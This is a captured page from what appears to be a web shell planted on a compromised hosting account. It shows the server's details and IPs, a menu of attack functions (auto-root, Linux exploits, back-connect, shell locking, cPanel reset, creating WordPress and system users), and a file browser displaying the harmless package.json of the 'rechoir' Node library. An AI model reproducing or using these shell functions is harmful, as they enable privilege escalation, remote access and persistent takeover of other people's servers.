Linux premium131.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
LiteSpeed
: 162.0.232.56 | : 216.73.216.178
Cant Read [ /etc/named.conf ]
8.1.33
syrihapj
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
syrihapj /
public_html /
node_modules /
rechoir /
[ HOME SHELL ]
Name
Size
Permission
Action
lib
[ DIR ]
dr-xr-xr-x
LICENSE
1.16
KB
-rw-r--r--
README.md
3.53
KB
-rw-r--r--
index.js
1.45
KB
-rw-r--r--
package.json
1.1
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "rechoir", "version": "0.7.1", "description": "Prepare a node environment to require files with different extensions.", "author": "Gulp Team <team@gulpjs.com> (http://gulpjs.com/)", "contributors": [ "Blaine Bublitz <blaine.bublitz@gmail.com>", "Tyler Kellen <tyler@sleekcode.net> (http://goingslowly.com/)" ], "repository": "gulpjs/rechoir", "license": "MIT", "engines": { "node": ">= 0.10" }, "main": "index.js", "files": [ "LICENSE", "index.js", "lib/" ], "scripts": { "lint": "eslint .", "pretest": "rm -rf tmp/ && npm run lint", "test": "mocha --async-only test test/lib", "cover": "istanbul cover _mocha --report lcovonly test test/lib", "coveralls": "npm run cover && istanbul-coveralls" }, "dependencies": { "resolve": "^1.9.0" }, "devDependencies": { "eslint": "^2.13.0", "eslint-config-gulp": "^3.0.1", "expect": "^1.20.2", "istanbul": "^0.4.3", "istanbul-coveralls": "^1.0.3", "mocha": "^3.5.3" }, "keywords": [ "require", "loader", "extension", "extensions", "prepare" ] }
Close